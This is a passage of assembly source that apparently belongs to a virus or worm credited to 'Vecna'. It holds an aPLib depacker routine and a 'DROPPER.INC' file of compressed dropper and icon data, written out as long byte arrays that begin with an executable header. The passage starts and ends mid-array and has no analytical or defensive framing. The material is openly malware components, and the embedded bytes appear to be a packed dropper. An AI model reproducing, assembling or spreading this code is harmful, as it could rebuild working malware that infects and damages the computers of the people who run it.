0BCh db 09Ch, 054h, 06Fh, 04Fh, 06Ch, 068h, 03Ch, 0D9h db 070h, 02Ah, 053h, 0BBh, 0C2h, 03Dh, 073h, 0FFh db 0A1h, 0DEh, 050h, 046h, 0BFh, 0C8h, 0F5h, 0EFh db 028h, 024h, 046h, 0F1h, 0EFh, 04Bh, 00Fh, 03Bh db 04Eh, 054h, 0FBh, 047h, 0F7h, 0D2h, 082h, 0A5h db 064h, 075h, 082h, 094h, 048h, 061h, 08Ch, 0DDh db 00Ch, 041h, 0A2h, 011h, 08Fh, 022h, 03Fh, 07Fh db 076h, 0DCh, 04Dh, 019h, 052h, 0EAh, 069h, 0A8h db 06Ah, 0D2h, 069h, 053h, 006h, 00Dh, 030h, 070h db 04Dh, 03Dh, 033h, 000h, 0FFh, 085h, 064h, 030h db 028h, 00Ch, 05Ch, 040h, 031h, 0E0h, 0CAh, 021h db 0A4h, 014h, 059h, 069h, 013h, 020h, 029h, 009h db 0C8h, 014h, 064h, 075h, 048h, 044h, 090h, 0D0h db 0F2h, 080h, 024h, 04Ch, 054h, 001h, 0B8h, 08Eh db 0CCh, 031h, 0A4h, 009h, 0AEh, 089h, 0C4h, 012h db 0D0h, 024h, 0E6h, 048h, 0FCh, 088h, 010h, 032h db 011h, 01Eh, 022h, 02Eh, 044h, 03Eh, 04Ch, 089h db 05Eh, 012h, 066h, 024h, 076h, 054h, 001h, 033h db 084h, 011h, 08Eh, 022h, 009h, 096h, 044h, 09Eh db 0ACh, 089h, 0BAh, 012h, 0CCh, 025h, 0D6h, 032h db 024h, 0E4h, 099h, 008h, 0F4h, 011h, 006h, 033h db 003h, 018h, 0A5h, 02Ah, 07Ch, 0A9h, 032h, 093h db 0D3h, 01Ch, 04Dh, 078h, 002h, 057h, 053h, 04Fh db 043h, 04Bh, 099h, 00Ch, 055h, 0F3h, 053h, 034h db 00Bh, 00Eh, 041h, 044h, 056h, 065h, 050h, 049h db 036h, 00Dh, 003h, 09Ah, 073h, 026h, 053h, 079h db 065h, 089h, 06Dh, 044h, 08Bh, 0A1h, 00Fh, 018h db 08Eh, 06Fh, 0BFh, 06Fh, 02Bh, 0FFh, 023h, 06Eh db 045h, 078h, 066h, 01Eh, 015h, 053h, 040h, 098h db 0BBh, 09Ah, 09Ch, 0EDh, 0DDh, 072h, 060h, 03Eh db 075h, 0CBh, 050h, 073h, 0E4h, 01Eh, 00Ah, 043h db 06Fh, 070h, 079h, 017h, 0A8h, 02Ch, 0C9h, 032h db 074h, 091h, 09Ch, 066h, 098h, 021h, 053h, 04Dh db 06Eh, 067h, 0D3h, 02Dh, 039h, 0DCh, 040h, 027h db 04Eh, 061h, 06Dh, 0AAh, 02Bh, 065h, 0F2h, 0CAh db 04Ch, 03Fh, 058h, 052h, 053h, 010h, 052h, 070h db 01Bh, 045h, 072h, 09Ah, 09Eh, 04Fh, 0A3h, 00Fh db 080h, 049h, 073h, 042h, 07Ah, 061h, 0A4h, 063h db 0DAh, 0B8h, 021h, 08Dh, 097h, 016h, 063h, 009h db 096h, 07Dh, 031h, 046h, 040h, 08Ch, 0B0h, 0D4h db 0CAh, 011h, 056h, 0CFh, 007h, 074h, 075h, 061h db 0D5h, 041h, 01Bh, 0E6h, 03Eh, 085h, 028h, 010h db 046h, 0D4h, 050h, 057h, 033h, 073h, 02Ah, 06Bh db 051h, 076h, 018h, 0B5h, 0F6h, 0F2h, 015h, 008h db 0FDh, 028h, 076h, 008h, 0EDh, 049h, 08Eh, 05Dh db 01Fh, 020h, 045h, 041h, 0A1h, 0D3h, 061h, 0B5h db 075h, 0A6h, 026h, 00Eh, 0E3h, 015h, 04Ch, 061h db 073h, 0A3h, 094h, 02Eh, 05Ch, 083h, 071h, 075h db 065h, 0A6h, 02Ah, 0A2h, 0C9h, 0E3h, 005h, 0FDh db 023h, 02Ah, 050h, 015h, 0CCh, 06Bh, 04Dh, 092h db 05Ch, 03Ch, 056h, 0E4h, 059h, 0CAh, 054h, 0D9h db 056h, 0A1h, 080h, 075h, 0E6h, 08Ah, 0C1h, 012h db 0CBh, 0B1h, 035h, 04Bh, 0E5h, 079h, 0A9h, 027h db 012h, 0A8h, 07Dh, 0D2h, 023h, 0DBh, 000h, 0EEh db 060h, 000h ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[UPDATER.INC]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[UNPACK.INC]ÄÄÄ ;*************************************************************** ;* aPLib v0.22b - the smaller the better :) * ;* WASM & TASM assembler depacker * ;* * ;* Copyright (c) 1998-99 by - Jibz - All Rights Reserved * ;*************************************************************** _aP_depack_asm: push ebp mov ebp, esp pushad push ebp mov esi, [ebp + 8] ; C calling convention mov edi, [ebp + 12] cld mov dl, 80h literal: movsb nexttag: call getbit jnc literal xor ecx, ecx call getbit jnc codepair xor eax, eax call getbit jnc shortmatch mov al, 10h getmorebits: call getbit adc al, al jnc getmorebits jnz domatch_with_inc stosb jmp short nexttag codepair: call getgamma_no_ecx dec ecx loop normalcodepair mov eax,ebp call getgamma jmp short domatch shortmatch: lodsb shr eax, 1 jz donedepacking adc ecx, 2 mov ebp, eax jmp short domatch normalcodepair: xchg eax, ecx dec eax shl eax, 8 lodsb mov ebp, eax call getgamma cmp eax, 32000 jae domatch_with_2inc cmp eax, 1280 jae domatch_with_inc cmp eax, 7fh ja domatch domatch_with_2inc: inc ecx domatch_with_inc: inc ecx domatch: push esi mov esi, edi sub esi, eax rep movsb pop esi jmp short nexttag getbit: add dl, dl jnz stillbitsleft mov dl, [esi] inc esi adc dl, dl stillbitsleft: ret getgamma: xor ecx, ecx getgamma_no_ecx: inc ecx getgammaloop: call getbit adc ecx, ecx call getbit jc getgammaloop ret donedepacking: pop ebp sub edi, [ebp + 12] mov [ebp - 4], edi ; return unpacked length in eax popad pop ebp ret 4*2 ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[UNPACK.INC]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[DROPPER.INC]ÄÄÄ ;Compressed Dropper&Icon data ;(C) Vecna dropper equ 0 coelho equ dropper+6144 hallwen equ coelho+1152 jesus equ hallwen+1152 ovo equ jesus+1152 santa equ ovo+1152 babylonia equ santa+1152 icon equ 12c8h db 04Dh, 038h, 05Ah, 090h, 038h, 003h, 066h, 002h db 004h, 009h, 071h, 0FFh, 081h, 0B8h, 0C2h, 091h db 001h, 040h, 0C2h, 015h, 0C6h, 0C0h, 009h, 00Eh db 0B4h, 04Ch, 0CDh, 021h, 015h, 001h, 0FAh, 0C6h db 050h, 045h, 008h, 028h, 04Ch, 001h, 0BEh, 00Ah db 0B0h, 0A2h, 00Ch, 038h, 014h, 0C7h, 0E0h, 001h db 00Fh, 001h, 00Bh, 0C8h, 005h, 00Ch, 0E0h, 002h db 0CAh, 01Bh, 012h, 015h, 065h, 010h, 032h, 004h db 020h, 0BAh, 0DEh, 08Ch, 00Ch, 041h, 004h, 0A6h db 01Fh, 0F1h, 05Dh, 051h, 04Ah, 00Dh, 02Bh, 002h db 039h, 039h, 0D3h, 008h, 09Ah, 00Fh, 09Eh, 080h db 065h, 05Ch, 0A1h, 050h, 031h, 053h, 060h, 009h db 04Bh, 0D9h, 0BDh, 095h, 0B1h, 05Ch, 01Fh, 0ACh db 02Eh, 01Ch, 074h, 065h, 078h, 0E2h, 038h, 0D6h db 001h, 052h, 0CCh, 0D4h, 0C5h, 057h, 043h, 0C0h db 060h, 02Eh, 072h, 064h, 061h, 072h, 074h, 080h db 06Ah, 002h, 0AEh, 0FCh, 0A1h, 024h, 006h, 05Ah db 028h, 055h, 0BBh, 0CDh, 02Eh, 049h, 027h, 0C1h db 0A1h, 032h, 00Dh, 029h, 030h, 028h, 090h, 00Ah db 0ACh, 0C0h, 0CEh, 0A0h, 073h, 04Eh, 063h, 015h db 0ECh, 0CAh, 040h, 024h, 065h, 00Eh, 02Ah, 028h db 070h, 0ADh, 001h, 0D7h, 061h, 0FCh, 0E8h, 0A0h db 034h, 042h, 066h, 000h, 0BBh, 0C6h, 0CAh, 00Fh db 0BAh, 0E0h, 01Fh, 073h, 060h, 004h, 014h, 0B1h db 0ABh, 064h, 067h, 026h, 08Bh, 00Eh, 02Bh, 001h db 0E3h, 002h, 0FFh, 0E1h, 0BEh, 031h, 00Bh, 020h db 0CDh, 0B9h, 044h, 059h, 0F6h, 000h, 016h, 0ACh db 0E2h, 0FBh, 0F7h, 0D3h, 066h, 089h, 031h, 01Dh db 024h, 027h, 068h, 059h, 043h, 005h, 004h, 01Ah db 075h, 0E8h, 04Fh, 00Ah, 093h, 00Ah, 0F9h, 05Dh db 031h, 0BFh, 028h, 0ABh, 04Ch, 00Ah, 091h, 054h db 07Fh, 070h, 095h, 0A7h, 01Eh, 090h, 03Ah, 0B2h db 036h, 011h, 077h, 009h, 047h, 04Bh, 0F4h, 027h db 027h, 0BCh, 01Fh, 06Ah, 076h, 010h, 0A3h, 074h db 0DBh, 00Dh, 07Ch, 00Bh, 0C8h, 026h, 0CDh, 0BEh db 028h, 0F4h, 01Dh, 075h, 00Bh, 087h, 011h, 01Ch db 088h, 0B0h, 0B2h, 00Fh, 0B5h, 031h, 09Ch, 00Dh db 091h, 013h, 09Fh, 0D5h, 00Dh, 023h, 0ECh, 0BCh db 0ABh, 0D7h, 016h, 0BDh, 0B0h, 0D2h, 017h, 055h db 08Bh, 0ECh, 003h, 083h, 0C4h, 0FCh, 068h, 061h db 032h, 022h, 09Fh, 053h, 030h, 0E8h, 07Bh, 02Bh db 089h, 045h, 0FCh, 0FEh, 074h, 011h, 023h, 068h db 08Dh, 01Ah, 0E8h, 07Dh, 0F5h, 0A2h, 01Fh, 0FFh db 075h, 041h, 024h, 064h, 08Fh, 01Bh, 085h, 0C0h db 02Ah, 0E5h, 00Ch, 011h, 04Ch, 014h, 0C9h, 0C3h db 04Bh, 0CAh, 07Bh, 06Ch, 071h, 014h, 04Eh, 00Dh db 022h, 001h, 006h, 0CCh, 0FFh, 025h, 054h, 020h db 085h, 0ECh, 050h, 0A9h, 006h, 04Ch, 00Ch, 048h db 086h, 043h, 044h, 021h, 018h, 090h, 01Ch, 0DEh db 0E1h, 090h, 024h, 0C8h, 028h, 064h, 014h, 032h db 02Ch, 019h, 030h, 00Ch, 034h, 086h, 043h, 038h db 021h, 03Ch, 090h, 00Ch, 0C8h, 008h, 064h, 004h db 037h, 008h, 0A9h, 001h, 0D4h, 032h, 054h, 022h db 008h, 046h, 024h, 036h, 048h, 02Ah, 0A8h, 001h db 04Ah, 0AAh, 00Ch, 0D2h, 056h, 009h, 064h, 089h db 070h, 012h, 082h, 024h, 092h, 048h, 0C0h, 091h db 0D6h, 022h, 0E4h, 044h, 0FCh, 014h, 0A6h, 030h db 044h, 03Eh, 030h, 089h, 028h, 012h, 01Ch, 024h db 008h, 0B6h, 012h, 010h, 0F0h, 020h, 0E3h, 04Ah db 032h, 029h, 044h, 021h, 0C0h, 096h, 014h, 066h db 01Ch, 081h, 014h, 021h, 052h, 0ACh, 014h, 0C8h db 060h, 0A8h, 0C2h, 0AFh, 0ACh, 05Ch, 050h, 0A0h db 09Eh, 072h, 003h, 061h, 077h, 041h, 06Eh, 069h db 06Dh, 0B0h, 074h, 065h, 064h, 073h, 052h, 076h db 063h, 070h, 073h, 054h, 0A8h, 014h, 049h, 0F6h db 06Fh, 067h, 06Eh, 040h, 0FBh, 001h, 047h, 065h db 074h, 0FDh, 043h, 0C0h, 0BBh, 001h, 078h, 04Dh db 071h, 073h, 03Eh, 061h, 067h, 084h, 042h, 06Fh db 078h, 041h, 087h, 06Eh, 0ECh, 054h, 06Ch, 0F7h db 0F9h, 073h, 0FBh, 00Fh, 035h, 055h, 053h, 045h db 0A0h, 033h, 032h, 02Eh, 064h, 06Ch, 0E3h, 09Ch db 05Ch, 075h, 03Eh, 000h, 078h, 069h, 074h, 050h db 072h, 06Fh, 063h, 0DCh, 05Bh, 014h, 088h, 0B6h db 07Dh, 00Fh, 06Eh, 064h, 043h, 06Ch, 0DBh, 050h db 082h, 08Ch, 0ACh, 00Ch, 008h, 072h, 0F8h, 074h db 0DBh, 00Ah, 076h, 070h, 086h, 054h, 091h, 012h db 04Eh, 0F6h, 078h, 0A6h, 011h, 050h, 0E1h, 06Ah db 043h, 038h, 075h, 072h, 0FCh, 06Dh, 06Eh, 0E2h db 050h, 053h, 08Ah, 06Fh, 0E3h, 079h, 035h, 051h db 0F9h, 031h, 027h, 023h, 06Eh, 0EEh, 072h, 0E5h db 062h, 075h, 00Ch, 0A7h, 073h, 02Dh, 044h, 044h db 001h, 053h, 06Fh, 079h, 09Ch, 0CAh, 06Dh, 02Dh db 059h, 05Fh, 043h, 016h, 056h, 0F6h, 0CAh, 052h db 069h, 0BCh, 028h, 064h, 00Eh, 06Fh, 057h, 0CBh db 0A5h, 077h, 073h, 038h, 052h, 03Eh, 029h, 002h db 053h, 06Ah, 079h, 073h, 0B7h, 030h, 0CCh, 0E7h db 070h, 005h, 04Bh, 00Eh, 0D1h, 04Eh, 06Ah, 04Ch db 0D4h, 051h, 018h, 040h, 046h, 050h, 069h, 078h db 0EBh, 09Fh, 019h, 053h, 03Ch, 0F6h, 01Bh, 061h db 079h, 04Dh, 020h, 0ADh, 024h, 091h, 096h, 082h db 020h, 078h, 06Fh, 03Dh, 079h, 042h, 03Fh, 07Ah db 06Ch, 0E8h, 01Ch, 099h, 0FCh, 053h, 0AEh, 02Ah db 015h, 047h, 044h, 049h, 041h, 095h, 001h, 0AEh db 0BCh, 0B3h, 001h, 090h, 09Eh, 09Bh, 09Ah, 08Dh db 0DFh, 0BAh, 0CFh, 0A7h, 09Eh, 0C1h, 0FFh, 0BEh db 0AFh, 0B6h, 0E9h, 091h, 0E1h, 08Bh, 0F9h, 099h db 0F1h, 08Ah, 0DCh, 09Bh, 0DEh, 0FEh, 0A8h, 06Fh db 096h, 00Ch, 0C7h, 088h, 08Ch, 0FDh, 04Ch, 0CCh db 08Dh, 09Ah, 03Fh, 08Eh, 08Ah, 06Ch, 00Ah, 02Ah db 0F2h, 01Eh, 0F5h, 0ABh, 097h, 073h, 026h, 08Fh db 03Fh, 05Eh, 098h, 09Eh, 09Eh, 092h, 01Fh, 088h db 01Ch, 093h, 07Eh, 09Eh, 09Dh, 09Ah, 01Bh, 08Bh db 088h, 0EEh, 05Ch, 060h, 09Eh, 00Eh, 09Bh, 0D1h db 0FFh, 0D5h, 0E6h, 0BAh, 072h, 0A7h, 0EDh, 0C2h db 0BDh, 001h, 0F5h, 0C7h, 002h, 004h, 003h, 0E3h db 07Fh, 011h, 080h, 00Eh, 035h, 038h, 011h, 068h db 020h, 001h, 0E1h, 0CAh, 025h, 050h, 02Bh, 018h db 05Ah, 04Ah, 0A4h, 068h, 018h, 056h, 02Bh, 009h db 004h, 015h, 0EAh, 018h, 0E4h, 090h, 044h, 0A0h db 040h, 005h, 0A8h, 008h, 028h, 01Ah, 048h, 065h db 049h, 008h, 014h, 02Ch, 02Ah, 028h, 09Eh, 00Fh db 0C5h, 040h, 054h, 036h, 029h, 085h, 080h, 004h db 03Dh, 04Bh, 04Bh, 001h, 029h, 080h, 06Dh, 03Bh db 0F8h, 0A4h, 007h, 0A3h, 002h, 036h, 013h, 0C0h db 002h, 008h, 040h, 0DCh, 0F0h, 02Dh, 0CAh, 0A6h db 00Eh, 093h, 03Ch, 019h, 099h, 009h, 066h, 012h db 033h, 02Fh, 0E8h, 0CCh, 039h, 0C4h, 099h, 089h db 066h, 012h, 033h, 02Eh, 011h, 07Eh, 06Eh, 099h db 031h, 091h, 078h, 08Bh, 0E4h, 05Fh, 022h, 0FBh db 017h, 0D8h, 0BAh, 045h, 0E2h, 02Fh, 091h, 07Ch db 08Bh, 0E4h, 05Eh, 062h, 0FBh, 017h, 088h, 0BEh db 045h, 0F2h, 02Ah, 014h, 038h, 045h, 0C2h, 02Eh db 011h, 06Ch, 009h, 0E6h, 0CCh, 0DDh, 0BFh, 036h db 097h, 008h, 047h, 066h, 022h, 033h, 0E1h, 016h db 006h, 0DFh, 039h, 0E2h, 0FFh, 016h, 009h, 045h db 033h, 0C2h, 02Ah, 08Ch, 03Eh, 0C5h, 0F6h, 02Fh db 0B1h, 07Ch, 08Bh, 0F4h, 05Fh, 022h, 0F9h, 017h db 0C8h, 0BEh, 045h, 0F2h, 02Fh, 0D1h, 07Ch, 08Bh db 0E4h, 05Fh, 022h, 0F9h, 017h, 0C8h, 0BFh, 045h db 049h, 08Ah, 0F2h, 0A6h, 002h, 099h, 009h, 044h db 066h, 033h, 08Bh, 084h, 054h, 094h, 022h, 099h db 0E9h, 017h, 088h, 0B2h, 008h, 033h, 02Eh, 011h db 051h, 090h, 0F2h, 02Fh, 091h, 07Ch, 08Bh, 0E4h db 05Fh, 022h, 0FDh, 017h, 0C8h, 0BEh, 045h, 0F2h db 02Fh, 0B1h, 07Dh, 08Bh, 0F4h, 05Fh, 062h, 0FBh db 017h, 0D8h, 0BEh, 045h, 0F2h, 02Fh, 0D1h, 07Ch db 08Bh, 0E4h, 05Fh, 022h, 0F9h, 017h, 0C8h, 0B5h db 031h, 037h, 08Ah, 0CAh, 002h, 099h, 066h, 009h db 033h, 017h, 008h, 0A8h, 090h, 0FDh, 017h, 048h db 0BCh, 045h, 0F2h, 02Fh, 091h, 07Ch, 08Bh, 0F4h db 05Fh, 022h, 0F9h, 017h, 0C8h, 0BEh, 045h, 0F2h db 02Fh, 0D1h, 07Ch, 08Bh, 0E4h, 05Fh, 022h, 0F9h db 017h, 0C8h, 0BFh, 045h, 0F2h, 02Fh, 091h, 07Dh db 08Bh, 0ECh, 05Fh, 062h, 0FDh, 017h, 0D8h, 0BEh db 0C5h, 0F2h, 02Fh, 091h, 07Ch, 091h, 0A6h, 094h db 0CCh, 08Ah, 0DFh, 02Ah, 002h, 06Eh, 033h, 009h db 011h, 051h, 090h, 0EAh, 02Fh, 0D1h, 078h, 08Bh db 0E4h, 05Fh, 022h, 0F9h, 017h, 0C8h, 0BFh, 045h db 0F2h, 02Fh, 091h, 07Ch, 08Bh, 0E4h, 05Fh, 022h db 0FDh, 017h, 0C8h, 0BEh, 045h, 0F2h, 02Fh, 091h db 07Ch, 08Bh, 0F4h, 05Fh, 022h, 0F9h, 017h, 0C8h db 0BEh, 045h, 0F2h, 02Fh, 0D1h, 07Ch, 08Bh, 0ECh db 05Fh, 062h, 0FBh, 033h, 032h, 024h, 0CCh, 016h db 06Fh, 0B4h, 08Eh, 0D4h, 002h, 070h, 0A2h, 014h db 06Ch, 08Bh, 0E1h, 014h, 0C9h, 063h, 0A6h, 050h db 027h, 0CEh, 011h, 069h, 028h, 033h, 0EBh, 084h db 05Ah, 030h, 04Ch, 0AFh, 0E1h, 016h, 030h, 093h db 073h, 038h, 045h, 0A4h, 030h, 037h, 0CEh, 011h db 06Ah, 030h, 0E3h, 0CAh, 0FFh, 04Dh, 030h, 059h db 0BFh, 0C2h, 02Dh, 026h, 059h, 083h, 0C2h, 02Dh db 028h, 049h, 037h, 0C2h, 02Ah, 082h, 06Ch, 002h db 0DDh, 0C8h, 009h, 0BBh, 091h, 0AAh, 022h, 088h db 044h, 077h, 055h, 089h, 044h, 012h, 022h, 095h db 01Fh, 04Dh, 002h, 0B6h, 01Eh, 002h, 02Eh, 0D5h db 002h, 004h, 036h, 044h, 002h, 02Eh, 0DCh, 002h db 010h, 011h, 057h, 02Bh, 096h, 00Ah, 0B4h, 0FBh db 0E1h, 00Eh, 0A4h, 0A0h, 03Ch, 016h, 080h, 027h db 0C9h, 00Fh, 095h, 003h, 049h, 091h, 052h, 007h db 058h, 050h, 0D4h, 00Fh, 04Fh, 02Eh, 06Eh, 0C0h db 0EAh, 0D6h, 0E9h, 0E8h, 0ADh, 0C0h, 002h, 0A7h db 082h, 057h, 007h, 07Ch, 07Bh, 0ECh, 0FDh, 0B3h db 020h, 002h, 0F5h, 087h, 028h, 09Dh, 0D9h, 0F0h db 03Dh, 0D6h, 0ADh, 0E8h, 0E5h, 016h, 03Eh, 0C7h db 006h, 0E9h, 0F0h, 0DCh, 036h, 0F1h, 0E9h, 0D7h db 079h, 006h, 01Ch, 0F4h, 0F5h, 0DAh, 05Ch, 0D4h db 069h, 020h, 029h, 001h, 09Eh, 0E9h, 0B3h, 077h db 0F1h, 08Eh, 00Ah, 0E9h, 0BEh, 088h, 06Eh, 03Ch db 047h, 0D5h, 0F3h, 01Dh, 041h, 0FEh, 0ACh, 03Eh db 00Ah, 082h, 0E3h, 0BDh, 082h, 0B6h, 0CFh, 04Ah db 006h, 0F9h, 0B7h, 064h, 0E4h, 04Dh, 082h, 049h db 040h, 0F7h, 065h, 0F1h, 036h, 0EFh, 019h, 083h db 04Ah, 0F0h, 0BBh, 00Eh, 06Dh, 0F9h, 084h, 0BFh db 086h, 099h, 0AEh, 0F3h, 082h, 0F4h, 0D2h, 0B3h db 020h, 076h, 002h, 0F1h, 049h, 0A9h, 04Bh, 0B2h db 050h, 08Ah, 0E6h, 0CAh, 03Eh, 0D4h, 020h, 04Ch db 03Dh, 07Ch, 072h, 05Dh, 0CEh, 00Bh, 051h, 02Ch db 057h, 00Eh, 0A7h, 0E9h, 0FDh, 0E9h, 08Ch, 0D4h db 0CFh, 0B3h, 0E4h, 0F3h, 051h, 0D5h, 020h, 0F6h db 0A0h, 040h, 07Ch, 057h, 051h, 007h, 0A3h, 0DEh db 098h, 0F6h, 032h, 02Bh, 07Ah, 05Dh, 0E7h, 0B1h db 021h, 044h, 0E9h, 0AEh, 094h, 03Eh, 0F4h, 020h db 06Dh, 01Ah, 026h, 0C7h, 072h, 039h, 06Eh, 02Bh db 03Ah, 072h, 01Dh, 032h, 05Fh, 0A7h, 0F9h, 055h db 084h, 057h, 0EEh, 02Dh, 042h, 0C2h, 0ADh, 020h db 0ACh, 0CBh, 028h, 047h, 007h, 01Eh, 071h, 0EBh db 0CDh, 07Ch, 0CFh, 03Eh, 047h, 0AEh, 069h, 025h db 011h, 0DAh, 00Fh, 060h, 0E8h, 054h, 041h, 036h db 0F7h, 004h, 04Ah, 0DEh, 0BEh, 075h, 020h, 00Eh db 0A9h, 0F1h, 034h, 020h, 06Fh, 04Eh, 046h, 0B2h db 0DAh, 081h, 0EDh, 0AAh, 0F9h, 001h, 0A3h, 0A3h db 096h, 0B4h, 048h, 0CFh, 011h, 092h, 04Ah, 063h db 0ADh, 0A6h, 031h, 080h, 0A6h, 0F5h, 056h, 020h db 07Ch, 050h, 007h, 0B9h, 032h, 0DDh, 006h, 0F6h db 055h, 090h, 091h, 02Fh, 036h, 044h, 014h, 0ABh db 0A3h, 0FDh, 05Bh, 020h, 070h, 073h, 0BBh, 0A2h db 09Dh, 08Dh, 0C0h, 0A8h, 0E8h, 0EBh, 0F6h, 0F9h db 043h, 0CFh, 051h, 0FEh, 012h, 0A1h, 00Eh, 058h db 053h, 060h, 07Ch, 054h, 07Ch, 0BBh, 0F6h, 0E3h db 047h, 09Fh, 06Dh, 0C4h, 0EEh, 08Dh, 0C4h, 046h db 0CBh, 050h, 038h, 0EFh, 0F7h, 0A9h, 091h, 0CEh db 046h, 020h, 0BCh, 037h, 032h, 0EBh, 02Bh, 01Dh db 031h, 0EAh, 0A6h, 0CCh, 0F7h, 00Eh, 0FDh, 0A9h db 088h, 0CEh, 033h, 0E2h, 081h, 06Ah, 041h, 024h db 033h, 036h, 07Fh, 009h, 0D5h, 034h, 08Ah, 062h db 032h, 032h, 05Dh, 0ADh, 0F0h, 0C4h, 0BEh, 0EEh db 0EFh, 041h, 099h, 033h, 0FFh, 056h, 002h, 006h db 06Ah, 0EBh, 004h, 001h, 03Fh, 048h, 067h, 08Eh db 0ECh, 05Ch, 0F5h, 04Ah, 04Ah, 0A1h, 0F7h, 05Bh db 09Dh, 02Bh, 0EAh, 0C5h, 092h, 043h, 0CCh, 017h db 0FFh, 054h, 05Dh, 092h, 01Eh, 06Ah, 0E9h, 002h db 0AAh, 024h, 0B1h, 0B3h, 0BEh, 0FFh, 051h, 0A4h db 0AEh, 0B6h, 05Ch, 0F9h, 00Eh, 0DBh, 043h, 08Ah db 026h, 080h, 0ADh, 065h, 063h, 0F1h, 0E7h, 085h db 049h, 040h, 051h, 004h, 018h, 0E8h, 095h, 054h db 01Bh, 0FAh, 0A4h, 0F6h, 0BDh, 0DBh, 002h, 070h db 032h, 058h, 02Bh, 07Bh, 0D6h, 08Ah, 020h, 09Eh db 036h, 09Ch, 03Ch, 09Ah, 01Ah, 091h, 0EBh, 028h db 0B4h, 0DBh, 082h, 0A0h, 06Ch, 070h, 088h, 0AFh db 0EAh, 0DCh, 0BFh, 037h, 0E8h, 026h, 0A7h, 078h db 0EDh, 0BFh, 0ECh, 0E6h, 0E6h, 0E8h, 043h, 0DFh db 081h, 066h, 04Ch, 0B8h, 07Dh, 0D3h, 025h, 027h db 031h, 0BDh, 0B6h, 0C3h, 0CFh, 0C9h, 00Dh, 08Dh db 060h, 0D5h, 0EFh, 0BFh, 0E9h, 055h, 0FBh, 0CBh db 076h, 012h, 0A9h, 08Ah, 082h, 033h, 04Bh, 031h db 0E9h, 0B3h, 0ECh, 0FFh, 0F3h, 074h, 01Eh, 04Dh db 007h, 0BEh, 04Dh, 087h, 07Bh, 091h, 07Bh, 03Dh db 06Dh, 084h, 02Eh, 054h, 060h, 095h, 090h, 01Fh db 087h, 0DBh, 057h, 0E2h, 0C5h, 036h, 0B3h, 01Eh db 090h, 065h, 092h, 07Bh, 0DAh, 037h, 0EAh, 063h db 0E8h, 024h, 041h, 0ADh, 009h, 039h, 0EEh, 087h db 0F6h, 036h, 019h, 0F3h, 099h, 04Eh, 0BAh, 0CCh db 0E4h, 072h, 0FEh, 0F0h, 0FDh, 044h, 040h, 0D3h db 01Fh, 0ECh, 0F3h, 0B3h, 033h, 0CCh, 0D6h, 025h db 0ADh, 069h, 0BDh, 0D4h, 00Eh, 08Fh, 04Dh, 057h db 050h, 031h, 0A1h, 0A8h, 01Ah, 040h, 0D9h, 0DAh db 0A6h, 0E7h, 035h, 013h, 065h, 05Ah, 0FEh, 044h db 003h, 0A1h, 0D0h, 0EBh, 0CAh, 0ADh, 0D3h, 002h db 064h, 071h, 07Ch, 0FFh, 0B4h, 0C1h, 0D2h, 0DBh db 0F9h, 049h, 09Ah, 06Ch, 003h, 08Eh, 0EFh, 0B0h db 02Dh, 0CBh, 006h, 088h, 047h, 03Ch, 057h, 02Dh db 027h, 01Ch, 020h, 019h, 0E6h, 0A6h, 09Eh, 0D2h db 0BFh, 05Bh, 06Eh, 020h, 0B9h, 031h, 05Ch, 021h db 093h, 0A9h, 008h, 020h, 0FEh, 053h, 0ECh, 001h db 056h, 020h, 052h, 00Dh, 052h, 01Fh, 0CAh, 007h db 001h, 0ABh, 020h, 0A9h, 00Eh, 02Bh, 022h, 028h db 01Eh, 055h, 0F6h, 001h, 059h, 020h, 049h, 00Eh db 0FDh, 0ECh, 059h, 03Eh, 0A5h, 019h, 08Ah, 004h db 080h, 0D3h, 0FDh, 01Ah, 001h, 084h, 09Ah, 03Fh db 08Fh, 01Eh, 0F2h, 0CBh, 027h, 053h, 00Dh, 06Ah db 042h, 020h, 064h, 0F6h, 035h, 02Bh, 001h, 053h db 020h, 0A7h, 0FFh, 0F1h, 0F7h, 018h, 0FCh, 0A7h db 041h, 01Bh, 01Dh, 002h, 07Fh, 041h, 08Dh, 035h db 083h, 066h, 021h, 03Dh, 0E6h, 016h, 0E3h, 049h db 0DBh, 04Bh, 01Fh, 06Ah, 040h, 021h, 0EAh, 01Fh db 0B9h, 06Ah, 082h, 022h, 044h, 0ECh, 09Ah, 040h db 02Bh, 0F6h, 01Fh, 0A9h, 021h, 0A4h, 040h, 04Ah db 021h, 05Ah, 091h, 020h, 016h, 019h, 023h, 01Dh db 09Ah, 002h, 0B4h, 0C3h, 0A4h, 060h, 0ADh, 09Dh db 0B8h, 048h, 003h, 0A7h, 008h, 0D3h, 085h, 07Dh db 020h, 0C2h, 01Bh, 084h, 09Dh, 05Ah, 0A9h, 01Ch db 040h, 053h, 053h, 027h, 004h, 09Fh, 0ABh, 080h db 0EDh, 043h, 04Dh, 044h, 0A9h, 011h, 080h, 052h db 045h, 064h, 06Ah, 0C0h, 0F2h, 094h, 0E1h, 09Bh db 018h, 0BDh, 0D7h, 01Fh, 094h, 082h, 0DAh, 028h db 065h, 067h, 035h, 018h, 079h, 01Fh, 04Dh, 020h db 04Dh, 001h, 044h, 020h, 0CAh, 0C0h, 089h, 007h db 01Ch, 071h, 0AFh, 020h, 0B7h, 0B1h, 035h, 0F6h db 03Dh, 020h, 0FAh, 03Eh, 0D2h, 023h, 03Dh, 0D0h db 049h, 0CDh, 0F2h, 0C7h, 004h, 0A9h, 05Dh, 035h db 004h, 06Dh, 08Dh, 049h, 0AEh, 0E6h, 09Eh, 010h db 0FDh, 05Fh, 0CDh, 06Bh, 0CDh, 036h, 060h, 0B1h 